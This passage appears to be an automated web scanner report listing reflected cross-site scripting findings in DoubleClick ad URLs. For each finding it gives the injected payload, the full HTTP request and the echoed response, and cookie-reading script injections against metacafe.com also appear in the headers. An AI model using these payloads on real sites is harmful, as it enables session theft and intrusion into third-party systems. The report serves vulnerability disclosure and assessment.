2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0b8'-alert(1)-'f42e8ff9e63 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87af'-alert(1)-'92dc5cf3e85 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28566"-alert(1)-"c54abcfeda6 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmo
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcbe"-alert(1)-"fd139792dbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74214'-alert(1)-'6b515b85808 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dc"-alert(1)-"4bc3c012150 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrl
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d096f'-alert(1)-'c9bc2352f53 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad9d5'-alert(1)-'414f1c46651 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25d83"-alert(1)-"24bc777dba0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

